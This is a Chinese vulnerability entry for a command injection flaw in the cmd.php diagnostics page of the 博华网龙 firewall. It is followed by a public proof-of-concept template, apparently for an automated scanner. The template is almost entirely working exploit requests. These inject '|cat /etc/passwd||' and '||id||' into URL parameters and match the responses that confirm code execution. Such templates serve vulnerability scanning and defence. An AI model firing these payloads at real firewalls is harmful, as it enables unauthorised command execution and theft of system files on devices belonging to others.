漏洞描述
博华网龙防火墙 cmd.php 过滤不足,导致命令拼接执行远程命令
"博华网龙防火墙"
bohuangwanglong-cmd-php-rce: 博华网龙防火墙 cmd.php 远程命令执行漏洞(OEM)
PoC代码[已公开]
id: bohuangwanglong-cmd-php-rce
info:
name: 博华网龙防火墙 cmd.php 远程命令执行漏洞(OEM)
author: zan8in
severity: critical
verified: true
description: |
博华网龙防火墙 cmd.php 过滤不足,导致命令拼接执行远程命令
"博华网龙防火墙"
reference:
- http://wiki.peiqi.tech/wiki/iot/%E5%8D%9A%E5%8D%8E%E7%BD%91%E9%BE%99/%E5%8D%9A%E5%8D%8E%E7%BD%91%E9%BE%99%E9%98%B2%E7%81%AB%E5%A2%99%20cmd.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
rules:
r0:
request:
method: GET
path: /diagnostics/cmd.php?action=arping&ifName=|cat /etc/passwd||
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
r1:
request:
method: GET
path: /diagnostics/cmd.php?action=ping&count=||id||
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() || r1()